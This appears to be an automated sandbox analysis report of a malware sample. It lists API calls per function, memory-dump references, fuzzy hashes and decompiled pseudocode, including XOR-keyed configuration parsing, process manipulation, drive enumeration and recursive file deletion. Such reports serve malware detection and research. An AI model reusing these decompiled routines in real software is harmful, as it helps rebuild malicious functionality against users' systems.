                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000), ref: 045748C5
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045748F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 94a6861a31200b4f86214e0514a3725672f4796264ed4cccfc21f2c04af89f96
                                                            • Instruction ID: 3f9d77ccb8de4fa3f3392a710dd1264a201b3a8eec59195c65477e9a71f085c5
                                                            • Opcode Fuzzy Hash: 94a6861a31200b4f86214e0514a3725672f4796264ed4cccfc21f2c04af89f96
                                                            • Instruction Fuzzy Hash: A3C1A0A17102169BE711EFB5FCC4D6B37DCBB4A7507118939A806E7200EE39F849BB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,00000000,?,0458C1E4,045805A4,0458C1E4,00000000,?,?,045722F6), ref: 0456D845
                                                            • GetLastError.KERNEL32(?,0458C1E4,045805A4,0458C1E4,00000000,?,?,045722F6), ref: 0456D853
                                                            • NtSetInformationProcess.NTDLL ref: 0456D8AD
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0456D8EC
                                                            • GetProcAddress.KERNEL32(?), ref: 0456D90D
                                                            • TerminateThread.KERNEL32(?,00000000,045722F6,00000004,00000000), ref: 0456D964
                                                            • CloseHandle.KERNEL32(?), ref: 0456D97A
                                                            • CloseHandle.KERNEL32(?), ref: 0456D9A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                                            • String ID:
                                                            • API String ID: 3529370251-0
                                                            • Opcode ID: 437105f231d6662b3988510083a724e2c47da126fad0d90635bc3b33d281c7cd
                                                            • Instruction ID: 1dac8c0874bd844af77e248c28a02b028db3eb801f107420c74906e3f78f9edf
                                                            • Opcode Fuzzy Hash: 437105f231d6662b3988510083a724e2c47da126fad0d90635bc3b33d281c7cd
                                                            • Instruction Fuzzy Hash: DC416C70604345EFD7119F25D848A1BBBF4FB88348F040D2DF546A3150DB75AA4CEB92
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                            • wcscpy.NTDLL ref: 0457A62A
                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0457A636
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457A647
                                                            • memset.NTDLL ref: 0457A664
                                                            • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0457A672
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0457A680
                                                            • GetDriveTypeW.KERNEL32(?), ref: 0457A68E
                                                            • lstrlenW.KERNEL32(?), ref: 0457A69A
                                                            • wcscpy.NTDLL ref: 0457A6AC
                                                            • lstrlenW.KERNEL32(?), ref: 0457A6C6
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457A6DF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                                            • String ID:
                                                            • API String ID: 3888849384-0
                                                            • Opcode ID: 69b76d3e20b4782c2706e7f4cc7cee83fe50fc50bf40e36452e7c09a0959b9c0
                                                            • Instruction ID: f536f525eb7e93aabb58beb85bd2c6ccb5e9518f6be8779a7e408904ce60845a
                                                            • Opcode Fuzzy Hash: 69b76d3e20b4782c2706e7f4cc7cee83fe50fc50bf40e36452e7c09a0959b9c0
                                                            • Instruction Fuzzy Hash: DF310B32800119FFDB119BA5EC88CDEBBB9FF49364B104029F105F2151EB35AE59EB64
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            C-Code - Quality: 95%
                                                            			E00DD2654(int* __ecx) {
                                                            				int _v8;
                                                            				void* _v12;
                                                            				void* _v16;
                                                            				void* __esi;
                                                            				signed int _t28;
                                                            				signed int _t33;
                                                            				signed int _t39;
                                                            				char* _t45;
                                                            				char* _t46;
                                                            				char* _t47;
                                                            				char* _t48;
                                                            				char* _t49;
                                                            				char* _t50;
                                                            				void* _t51;
                                                            				void* _t52;
                                                            				intOrPtr _t53;
                                                            				signed int _t59;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				signed int _t64;
                                                            				signed int _t67;
                                                            				signed int _t71;
                                                            				signed int _t75;
                                                            				signed int _t79;
                                                            				signed int _t83;
                                                            				signed int _t87;
                                                            				void* _t92;
                                                            				intOrPtr _t109;
                                                            
                                                            				_t93 = __ecx;
                                                            				_t28 =  *0xdda2d0; // 0x69b25f44
                                                            				if(E00DD57E5( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                            					 *0xdda324 = _v8;
                                                            				}
                                                            				_t33 =  *0xdda2d0; // 0x69b25f44
                                                            				if(E00DD57E5( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                            					_v12 = 2;
                                                            					L57:
                                                            					return _v12;
                                                            				}
                                                            				_t39 =  *0xdda2d0; // 0x69b25f44
                                                            				if(E00DD57E5( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                            					L55:
                                                            					HeapFree( *0xdda290, 0, _v16);
                                                            					goto L57;
                                                            				} else {
                                                            					_t92 = _v12;
                                                            					if(_t92 == 0) {
                                                            						_t45 = 0;
                                                            					} else {
                                                            						_t87 =  *0xdda2d0; // 0x69b25f44
                                                            						_t45 = E00DD3154(_t93, _t92, _t87 ^ 0x7895433b);
                                                            					}
                                                            					if(_t45 != 0) {
                                                            						_t93 =  &_v8;
                                                            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                            							 *0xdda298 = _v8;
                                                            						}
                                                            					}
                                                            					if(_t92 == 0) {
                                                            						_t46 = 0;
                                                            					} else {
                                                            						_t83 =  *0xdda2d0; // 0x69b25f44
                                                            						_t46 = E00DD3154(_t93, _t92, _t83 ^ 0x219b08c7);
                                                            					}
                                                            					if(_t46 != 0) {
                                                            						_t93 =  &_v8;
                                                            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                            							 *0xdda29c = _v8;
                                                            						}
                                                            					}
                                                            					if(_t92 == 0) {
                                                            						_t47 = 0;
                                                            					} else {
                                                            						_t79 =  *0xdda2d0; // 0x69b25f44
                                                            						_t47 = E00DD3154(_t93, _t92, _t79 ^ 0x31fc0661);
                                                            					}
                                                            					if(_t47 != 0) {
                                                            						_t93 =  &_v8;
                                                            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                            							 *0xdda2a0 = _v8;
                                                            						}
                                                            					}
                                                            					if(_t92 == 0) {
                                                            						_t48 = 0;
                                                            					} else {
                                                            						_t75 =  *0xdda2d0; // 0x69b25f44
                                                            						_t48 = E00DD3154(_t93, _t92, _t75 ^ 0x0cd926ce);
                                                            					}
                                                            					if(_t48 != 0) {
                                                            						_t93 =  &_v8;
                                                            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                            							 *0xdda004 = _v8;
                                                            						}
                                                            					}
                                                            					if(_t92 == 0) {
                                                            						_t49 = 0;
                                                            					} else {
                                                            						_t71 =  *0xdda2d0; // 0x69b25f44
                                                            						_t49 = E00DD3154(_t93, _t92, _t71 ^ 0x3cd8b2cb);
                                                            					}
                                                            					if(_t49 != 0) {
                                                            						_t93 =  &_v8;
                                                            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                            							 *0xdda02c = _v8;
                                                            						}
                                                            					}
                                                            					if(_t92 == 0) {
                                                            						_t50 = 0;
                                                            					} else {
                                                            						_t67 =  *0xdda2d0; // 0x69b25f44
                                                            						_t50 = E00DD3154(_t93, _t92, _t67 ^ 0x2878b929);
                                                            					}
                                                            					if(_t50 == 0) {
                                                            						L41:
                                                            						 *0xdda2a4 = 5;
                                                            						goto L42;
                                                            					} else {
                                                            						_t93 =  &_v8;
                                                            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                            							goto L41;
                                                            						} else {
                                                            							L42:
                                                            							if(_t92 == 0) {
                                                            								_t51 = 0;
                                                            							} else {
                                                            								_t64 =  *0xdda2d0; // 0x69b25f44
                                                            								_t51 = E00DD3154(_t93, _t92, _t64 ^ 0x261a367a);
                                                            							}
                                                            							if(_t51 != 0) {
                                                            								_push(_t51);
                                                            								_t61 = 0x10;
                                                            								_t62 = E00DD496F(_t61);
                                                            								if(_t62 != 0) {
                                                            									_push(_t62);
                                                            									E00DD1000();
                                                            								}
                                                            							}
                                                            							if(_t92 == 0) {
                                                            								_t52 = 0;
                                                            							} else {
                                                            								_t59 =  *0xdda2d0; // 0x69b25f44
                                                            								_t52 = E00DD3154(_t93, _t92, _t59 ^ 0xb9d404b2);
                                                            							}
                                                            							if(_t52 != 0 && E00DD496F(0, _t52) != 0) {
                                                            								_t109 =  *0xdda37c; // 0x39c9630
                                                            								E00DD25ED(_t109 + 4, _t57);
                                                            							}
                                                            							_t53 =  *0xdda2d4; // 0x2bed5a8
                                                            							_t22 = _t53 + 0xddb2d2; // 0x39c887a
                                                            							_t23 = _t53 + 0xddb7c4; // 0x6976612e
                                                            							 *0xdda320 = _t22;
                                                            							 *0xdda390 = _t23;
                                                            							HeapFree( *0xdda290, 0, _t92);
                                                            							_v12 = 0;
                                                            							goto L55;
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD26F9
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD272B
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD275D
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD278F
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD27C1
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD27F3
                                                            • HeapFree.KERNEL32(00000000,?,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD2896
                                                            • HeapFree.KERNEL32(00000000,?,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD28A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 4097730f958ec53aaf9f7b4ef3a13ae87c592fcfa8273ddd68fdf544e5ddef52
                                                            • Instruction ID: 6ddec3c21d5f07135f050d6d298a3191dec1fd317f38d9ab39287ddc7088e046
                                                            • Opcode Fuzzy Hash: 4097730f958ec53aaf9f7b4ef3a13ae87c592fcfa8273ddd68fdf544e5ddef52
                                                            • Instruction Fuzzy Hash: 22716175A01305BACB21DBB9DD88D7F7BB9EB58700B284827E406D3315EA32DE049B71
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%
                                                            APIs
                                                              • Part of subcall function 04562B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,770F4620,00000000,00000000,0456114F,?), ref: 04562B66
                                                              • Part of subcall function 04562B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04562B83
                                                            • FreeLibrary.KERNEL32(?), ref: 0457CD80
                                                              • Part of subcall function 04577E67: lstrlenW.KERNEL32(?,00000000,?,?,?,0457CCC5,?,?), ref: 04577E74
                                                              • Part of subcall function 04577E67: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0457CCC5,?,?), ref: 04577E9D
                                                              • Part of subcall function 04577E67: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04577EBD
                                                              • Part of subcall function 04577E67: lstrcpyW.KERNEL32(-00000002,?), ref: 04577ED8
                                                              • Part of subcall function 04577E67: SetCurrentDirectoryW.KERNEL32(?,?,?,?,0457CCC5,?,?), ref: 04577EE4
                                                              • Part of subcall function 04577E67: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,0457CCC5,?,?), ref: 04577EE7
                                                              • Part of subcall function 04577E67: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,0457CCC5,?,?), ref: 04577EF3
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F10
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F2A
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F40
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F56
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F6C
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F82
                                                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0457CCD6
                                                            • lstrlenW.KERNEL32(?), ref: 0457CCF2
                                                            • lstrlenW.KERNEL32(?), ref: 0457CD0A
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0457CD23
                                                            • lstrcpyW.KERNEL32(00000002), ref: 0457CD38
                                                              • Part of subcall function 0458100F: lstrlenW.KERNEL32(00000000,00000000,73BB8250,73B769A0,?,?,?,0457CD48,?,00000000,0456EE2A), ref: 0458101F
                                                              • Part of subcall function 0458100F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0457CD48,?,00000000,0456EE2A), ref: 04581041
                                                              • Part of subcall function 0458100F: lstrcpyW.KERNEL32(00000000,00000000), ref: 0458106D
                                                              • Part of subcall function 0458100F: lstrcatW.KERNEL32(00000000,?), ref: 04581080
                                                            • FindNextFileW.KERNEL32(?,00000010), ref: 0457CD60
                                                            • FindClose.KERNEL32(00000002), ref: 0457CD6E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                                            • String ID:
                                                            • API String ID: 1209511739-0
                                                            • Opcode ID: 7a3f480d1a3077bc139e3cb99a6d2224f5857b168c8cd04e8232bcfdba89173d
                                                            • Instruction ID: 02267df2533175c5555e7ff0b91a578c32c97eead2b9dcaf41ca1ae5cd943a33
                                                            • Opcode Fuzzy Hash: 7a3f480d1a3077bc139e3cb99a6d2224f5857b168c8cd04e8232bcfdba89173d
                                                            • Instruction Fuzzy Hash: CB416D71404342AFD711EF60E844A2FBBE8FF89B05F04492DF990E2150DB35E909AB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000), ref: 045719A7
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04571A10
                                                            • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 04571A38
                                                            • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 04571A8A
                                                            • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 04571A95
                                                            • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04571AA8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                                            • String ID:
                                                            • API String ID: 499515686-0
                                                            • Opcode ID: 302a72ccb702e888f07669f3d7bdfa757a68c5c6266bee4ebc9d44a23a7507c6
                                                            • Instruction ID: d42729fcd76d407768c7dbcfc677aa090f8f4ddd7020719d88195dcdb4e66fcd
                                                            • Opcode Fuzzy Hash: 302a72ccb702e888f07669f3d7bdfa757a68c5c6266bee4ebc9d44a23a7507c6
                                                            • Instruction Fuzzy Hash: E5416E7190060AEFDF11EFA4ED44AAE7BB9FF00704F144669E801B6250EB75AB54FB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0458374E: memset.NTDLL ref: 0458376E
                                                              • Part of subcall function 0458374E: memset.NTDLL ref: 045838A2
                                                              • Part of subcall function 0458374E: memset.NTDLL ref: 045838B7
                                                            • memcpy.NTDLL(?,00008F12,0000011E), ref: 0457C679
                                                            • memset.NTDLL ref: 0457C6AF
                                                            • memset.NTDLL ref: 0457C6FD
                                                            • memset.NTDLL ref: 0457C77C
                                                            • memset.NTDLL ref: 0457C7EB
                                                            • memset.NTDLL ref: 0457C8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: d0b8ebad7f16959bc61f4dd2fb7fbc119d01e9a7edbd370f882f2edf3226e720
                                                            • Instruction ID: 19b4fe2317bb326b69f6ab83349bbb81bb0826c6cd225ec62a7a4462e0f0eaf7
                                                            • Opcode Fuzzy Hash: d0b8ebad7f16959bc61f4dd2fb7fbc119d01e9a7edbd370f882f2edf3226e720
                                                            • Instruction Fuzzy Hash: 41F1DD30600B8ACFDB32CF69E5846AABBF4BF42704F144D6DD5D796682D231BA45EB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E6E4B2495(long _a4) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				signed int _v16;
                                                            				short* _v32;
                                                            				void _v36;
                                                            				void* _t57;
                                                            				signed int _t58;
                                                            				signed int _t61;
                                                            				signed int _t62;
                                                            				void* _t63;
                                                            				signed int* _t68;
                                                            				intOrPtr* _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr _t72;
                                                            				intOrPtr _t75;
                                                            				void* _t76;
                                                            				signed int _t77;
                                                            				void* _t78;
                                                            				void _t80;
                                                            				signed int _t81;
                                                            				signed int _t84;
                                                            				signed int _t86;
                                                            				short* _t87;
                                                            				void* _t89;
                                                            				signed int* _t90;
                                                            				long _t91;
                                                            				signed int _t93;
                                                            				signed int _t94;
                                                            				signed int _t100;
                                                            				signed int _t102;
                                                            				void* _t104;
                                                            				long _t108;
                                                            				signed int _t110;
                                                            
                                                            				_t108 = _a4;
                                                            				_t76 =  *(_t108 + 8);
                                                            				if((_t76 & 0x00000003) != 0) {
                                                            					L3:
                                                            					return 0;
                                                            				}
                                                            				_a4 =  *[fs:0x4];
                                                            				_v8 =  *[fs:0x8];
                                                            				if(_t76 < _v8 || _t76 >= _a4) {
                                                            					_t102 =  *(_t108 + 0xc);
                                                            					__eflags = _t102 - 0xffffffff;
                                                            					if(_t102 != 0xffffffff) {
                                                            						_t91 = 0;
                                                            						__eflags = 0;
                                                            						_a4 = 0;
                                                            						_t57 = _t76;
                                                            						do {
                                                            							_t80 =  *_t57;
                                                            							__eflags = _t80 - 0xffffffff;
                                                            							if(_t80 == 0xffffffff) {
                                                            								goto L9;
                                                            							}
                                                            							__eflags = _t80 - _t91;
                                                            							if(_t80 >= _t91) {
                                                            								L20:
                                                            								_t63 = 0;
                                                            								L60:
                                                            								return _t63;
                                                            							}
                                                            							L9:
                                                            							__eflags =  *(_t57 + 4);
                                                            							if( *(_t57 + 4) != 0) {
                                                            								_t12 =  &_a4;
                                                            								 *_t12 = _a4 + 1;
                                                            								__eflags =  *_t12;
                                                            							}
                                                            							_t91 = _t91 + 1;
                                                            							_t57 = _t57 + 0xc;
                                                            							__eflags = _t91 - _t102;
                                                            						} while (_t91 <= _t102);
                                                            						__eflags = _a4;
                                                            						if(_a4 == 0) {
                                                            							L15:
                                                            							_t81 =  *0x6e4b41f8;
                                                            							_t110 = _t76 & 0xfffff000;
                                                            							_t58 = 0;
                                                            							__eflags = _t81;
                                                            							if(_t81 <= 0) {
                                                            								L18:
                                                            								_t104 = _t102 | 0xffffffff;
                                                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                            								__eflags = _t61;
                                                            								if(_t61 < 0) {
                                                            									_t62 = 0;
                                                            									__eflags = 0;
                                                            								} else {
                                                            									_t62 = _a4;
                                                            								}
                                                            								__eflags = _t62;
                                                            								if(_t62 == 0) {
                                                            									L59:
                                                            									_t63 = _t104;
                                                            									goto L60;
                                                            								} else {
                                                            									__eflags = _v12 - 0x1000000;
                                                            									if(_v12 != 0x1000000) {
                                                            										goto L59;
                                                            									}
                                                            									__eflags = _v16 & 0x000000cc;
                                                            									if((_v16 & 0x000000cc) == 0) {
                                                            										L46:
                                                            										_t63 = 1;
                                                            										 *0x6e4b4240 = 1;
                                                            										__eflags =  *0x6e4b4240;
                                                            										if( *0x6e4b4240 != 0) {
                                                            											goto L60;
                                                            										}
                                                            										_t84 =  *0x6e4b41f8;
                                                            										__eflags = _t84;
                                                            										_t93 = _t84;
                                                            										if(_t84 <= 0) {
                                                            											L51:
                                                            											__eflags = _t93;
                                                            											if(_t93 != 0) {
                                                            												L58:
                                                            												 *0x6e4b4240 = 0;
                                                            												goto L5;
                                                            											}
                                                            											_t77 = 0xf;
                                                            											__eflags = _t84 - _t77;
                                                            											if(_t84 <= _t77) {
                                                            												_t77 = _t84;
                                                            											}
                                                            											_t94 = 0;
                                                            											__eflags = _t77;
                                                            											if(_t77 < 0) {
                                                            												L56:
                                                            												__eflags = _t84 - 0x10;
                                                            												if(_t84 < 0x10) {
                                                            													_t86 = _t84 + 1;
                                                            													__eflags = _t86;
                                                            													 *0x6e4b41f8 = _t86;
                                                            												}
                                                            												goto L58;
                                                            											} else {
                                                            												do {
                                                            													_t68 = 0x6e4b4200 + _t94 * 4;
                                                            													_t94 = _t94 + 1;
                                                            													__eflags = _t94 - _t77;
                                                            													 *_t68 = _t110;
                                                            													_t110 =  *_t68;
                                                            												} while (_t94 <= _t77);
                                                            												goto L56;
                                                            											}
                                                            										}
                                                            										_t69 = 0x6e4b41fc + _t84 * 4;
                                                            										while(1) {
                                                            											__eflags =  *_t69 - _t110;
                                                            											if( *_t69 == _t110) {
                                                            												goto L51;
                                                            											}
                                                            											_t93 = _t93 - 1;
                                                            											_t69 = _t69 - 4;
                                                            											__eflags = _t93;
                                                            											if(_t93 > 0) {
                                                            												continue;
                                                            											}
                                                            											goto L51;
                                                            										}
                                                            										goto L51;
                                                            									}
                                                            									_t87 = _v32;
                                                            									__eflags =  *_t87 - 0x5a4d;
                                                            									if( *_t87 != 0x5a4d) {
                                                            										goto L59;
                                                            									}
                                                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                            									__eflags =  *_t71 - 0x4550;
                                                            									if( *_t71 != 0x4550) {
                                                            										goto L59;
                                                            									}
                                                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                            										goto L59;
                                                            									}
                                                            									_t78 = _t76 - _t87;
                                                            									__eflags =  *((short*)(_t71 + 6));
                                                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                            									if( *((short*)(_t71 + 6)) <= 0) {
                                                            										goto L59;
                                                            									}
                                                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                            									__eflags = _t78 - _t72;
                                                            									if(_t78 < _t72) {
                                                            										goto L46;
                                                            									}
                                                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                            										goto L46;
                                                            									}
                                                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                            										goto L20;
                                                            									}
                                                            									goto L46;
                                                            								}
                                                            							} else {
                                                            								goto L16;
                                                            							}
                                                            							while(1) {
                                                            								L16:
                                                            								__eflags =  *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) - _t110;
                                                            								if( *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) == _t110) {
                                                            									break;
                                                            								}
                                                            								_t58 = _t58 + 1;
                                                            								__eflags = _t58 - _t81;
                                                            								if(_t58 < _t81) {
                                                            									continue;
                                                            								}
                                                            								goto L18;
                                                            							}
                                                            							__eflags = _t58;
                                                            							if(_t58 <= 0) {
                                                            								goto L5;
                                                            							}
                                                            							 *0x6e4b4240 = 1;
                                                            							__eflags =  *0x6e4b4240;
                                                            							if( *0x6e4b4240 != 0) {
                                                            								goto L5;
                                                            							}
                                                            							__eflags =  *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) - _t110;
                                                            							if( *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) == _t110) {
                                                            								L32:
                                                            								_t100 = 0;
                                                            								__eflags = _t58;
                                                            								if(_t58 < 0) {
                                                            									L34:
                                                            									 *0x6e4b4240 = 0;
                                                            									goto L5;
                                                            								} else {
                                                            									goto L33;
                                                            								}
                                                            								do {
                                                            									L33:
                                                            									_t90 = 0x6e4b4200 + _t100 * 4;
                                                            									_t100 = _t100 + 1;
                                                            									__eflags = _t100 - _t58;
                                                            									 *_t90 = _t110;
                                                            									_t110 =  *_t90;
                                                            								} while (_t100 <= _t58);
                                                            								goto L34;
                                                            							}
                                                            							_t58 = _t81 - 1;
                                                            							__eflags = _t58;
                                                            							if(_t58 < 0) {
                                                            								L28:
                                                            								__eflags = _t81 - 0x10;
                                                            								if(_t81 < 0x10) {
                                                            									_t81 = _t81 + 1;
                                                            									__eflags = _t81;
                                                            									 *0x6e4b41f8 = _t81;
                                                            								}
                                                            								_t58 = _t81 - 1;
                                                            								goto L32;
                                                            							} else {
                                                            								goto L25;
                                                            							}
                                                            							while(1) {
                                                            								L25:
                                                            								__eflags =  *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) - _t110;
                                                            								if( *((intOrPtr*)(0x6e4b4200 + _t58 * 4)) == _t110) {
                                                            									break;
                                                            								}
                                                            								_t58 = _t58 - 1;
                                                            								__eflags = _t58;
                                                            								if(_t58 >= 0) {
                                                            									continue;
                                                            								}
                                                            								break;
                                                            							}
                                                            							__eflags = _t58;
                                                            							if(__eflags >= 0) {
                                                            								if(__eflags == 0) {
                                                            									goto L34;
                                                            								}
                                                            								goto L32;
                                                            							}
                                                            							goto L28;
                                                            						}
                                                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                            						__eflags = _t75 - _v8;
                                                            						if(_t75 < _v8) {
                                                            							goto L20;
                                                            						}
                                                            						__eflags = _t75 - _t108;
                                                            						if(_t75 >= _t108) {
                                                            							goto L20;
                                                            						}
                                                            						goto L15;
                                                            					}
                                                            					L5:
                                                            					_t63 = 1;
                                                            					goto L60;
                                                            				} else {
                                                            					goto L3;
                                                            				}
                                                            			}
                                                            0x6e4b249f
                                                            0x6e4b24a2
                                                            0x6e4b24a8
                                                            0x6e4b24c6
                                                            0x00000000
                                                            0x6e4b24c6
                                                            0x6e4b24b0
                                                            0x6e4b24b9
                                                            0x6e4b24bf
                                                            0x6e4b24ce
                                                            0x6e4b24d1
                                                            0x6e4b24d4
                                                            0x6e4b24de
                                                            0x6e4b24de
                                                            0x6e4b24e0
                                                            0x6e4b24e3
                                                            0x6e4b24e5
                                                            0x6e4b24e5
                                                            0x6e4b24e7
                                                            0x6e4b24ea
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b24ec
                                                            0x6e4b24ee
                                                            0x6e4b2554
                                                            0x6e4b2554
                                                            0x6e4b26b2
